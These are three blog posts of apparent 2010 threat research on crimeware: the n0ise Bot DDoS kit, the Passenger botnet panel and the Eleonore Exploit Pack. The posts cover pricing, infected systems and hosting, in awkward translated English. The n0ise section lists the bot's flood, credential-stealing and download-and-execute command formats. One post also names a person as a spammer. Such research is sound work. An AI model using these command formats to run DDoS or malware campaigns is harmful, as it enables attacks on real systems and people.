MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

29.6.10

DDoS attacks are not a trivial problem, and various web applications in this style, such as BlackEnergy have been used to run campaigns of massive attacks, in the case of BE during the conflict between Russia and Georgia.

The impact of such threats is extremely critical, and under this flag in the circuit enters the business that is channeled through crimeware, a web application called n0ise Bot German origin, although not yet have a good impact on criminal ecosystem, takes on the black market for some time.

n0ise Bot is designed exclusively to recruit zombies and executing attacks Distributed Denial of Service.

It has a minimalist design but offers the information needed to manage the zombies to be used as a means to carry out DDoS attacks.

The commands that can be used through the basic configuration of this crimeware are:

Syn-Flood - synflood*Host*Port*Threads*Sockets

HTTP-Flood - httpflood*Host*Threads

UDP-Flood - udpflood*Host*Port*Threads*Sockets*Packetsize

ICMP-Flood - icmpflood*Host*Port*Threads*Sockets*Packetsize

Multi Stealer - steal*Link to Uploadscript

Download and Execute - downandexe*LinkToFile

Visit Page - visit*Link

Bot Update - update*LinkToNewBot

Remove Bot - remove*Name

The business strategy employed for the sale of crimeware, adds to the tendency to whiten their existence through the advertising displayed across the website "official" crimeware called Coding-Revolutions, which also sell other applications for handling malicious code for "secure communications" under the slogan "Willkommen im Shop von neuen n0ise Malware!" (Something like "Welcome to the new store n0ise malware").

As shown in the image, n0ise Bot cost is € 50 (only the binary without the constructor) and € 250 (binary lifetime including future upgrades) transactions are made through the service paysafecard, a payment system online that leaves no traces of those involved in the transactions.

However, since May 2010 the developer has released the second version (2.1) where the cost of the binary is still € 50 but the lifetime value of this low at € 200, perhaps as a consequence of their lack of impact between computer criminals.

26.6.10

If you 5/6 years ago we were talking about control and centralized management of botnets (C&C) via http, when the massive operating botnets through IRC channels, it was seen as a trend.

After the first appearance of the odd kit, demand began to be high but the supply was poor. However, despite having spent several years, today continue to set trends in crimeware and demand remains high but with the difference that the offer is directly proportional.

Under this scenario every day we witness the appearance of any web application that adds to the offer, exclusively designed to feed the demand, facilitate and manage intelligence "assets" (zombies) of offenders. Another concrete example of this trend is Passenger Admin Panel.

As can be seen in terms of images, Passenger is of Russian origin and apparently it's a private version or designed on demand, as there are no references to its development.

It has only three options. The first of these, the statistics panel which centralises information relating to number of zombies (in this case 16.845), number of active zombies (582) - this information is refreshed every 60 minutes - many recruited zombies per day (36) , number of victims during the past 24 pm (7.349), among other data.

The statistics continue to show data about the versions of the bots and the amount of zombies recruited by each affiliate ID with the number of victims who have (in this case there are two affiliated with zombies 16.842 and 3 respectively), status of the module over Interestingly called Putty Grabber with your records and the number of operating systems involved.

Regarding operating systems that are part of the range of victims of this botnet are:

Microsoft Windows 2000 Service Pack 3

Microsoft Windows Server 2003

Microsoft Windows Server 2003 Service Pack 1 and 2

Microsoft Windows Server 2003 R2 Service Pack 1 and 2

Microsoft Windows XP

Microsoft Windows XP Service Pack 1, 2 and 3

Windows XP by Rushen 10.5 Minimal Service Pack 3

Windows Vista (TM) Business

Windows Vista (TM) Business Service Pack 1 and 2

Windows Vista (TM) Home Basic

Windows Vista (TM) Home Basic Service Pack 1 and 2

Windows Vista (TM) Home Premium

Windows Vista (TM) Home Premium Service Pack 1 and 2

Windows Vista (TM) Ultimate Service Pack 1 and 2

Windows Server (R) 2008 Standard Service Pack 2

Passenger can set the task of updating the bot through a previously assigned URL that points to a file called u.php. However, as mentioned above, the most interesting feature for the offender provides Putty Grabber module, which displays specific information and stores sensitive data for each compromised computer.

Undoubtedly, the crimeware is a very critical problem that operates globally and on a large scale, and the constant emergence of alternatives as specified in this is further evidence of this.

23.6.10

Undoubtedly the crimeware rate exploit pack and malware kit, whether these general purpose, such as ZeuS or as RussKill particular purpose, have become the creme de la creme of computer crime and synonymous with the easy for cybercriminals.

Based on this, one of the fastest growing crimeware over the past six months is Eleonore Exploit Pack. He is currently on the lips of many would-be cyber criminals who use, and safety professionals who have noticed its impact within the crime scene because of its increasingly progressive recruitment of followers, which justifies the reason for investigation.

Earlier this year we gave to know how the developer of this application site was releasing different versions of crimeware and from the final version of the time (1.3.2) to current (1.4.1), things have changed little.

The truth is that, as shown in the image, attack coverage including a considerable number of operating systems, an aspect that also has become a trend for some exploits pack, as the case of Siberia Exploit Pack, until even shares a similar taste to a story in this design.

But again let's review the chronology of the emergence of different versions:

The basis of this botnet is hosted in the U.S., the vendor under the Secured Private Network on ASN22298, it also hosts malware type rogue, fakeAV, some other trojans, variants of ZeuS, even some families Koobface and maintained by business services QuadraNet led by a spammer Israeli named Ilan Mishan, also well known in the offense to give the necessary resources to accommodate hosting activities spam, scam, phishing, pornography, including through other companies such as OC-3 Networks and PacificRack bonded under QuadraNet.

Despite having the C&C in the U.S., the highest rate of activity is in Eastern Europe, just in Ukraine where the largest number of computers whose security has been breached by one of the many exploits that are disseminated Eleonore Exploit Pack.

On the other hand, it's interesting to know the web pages through which refer to the pre-compiled exploits Eleonore. The lists are usually very long and quite varied between subjects, which usually characterize the pages that have sexually explicit content, the spread of FakeAV, casinos and pharmacies online, among others.

Also, another closely linked with the scenario that represents the business of these criminal activities: affiliate programs. In this case, one is promoted for the purchase of web traffic, where the axis of business is to get money through advertising and injected into web pages displayed in popup windows.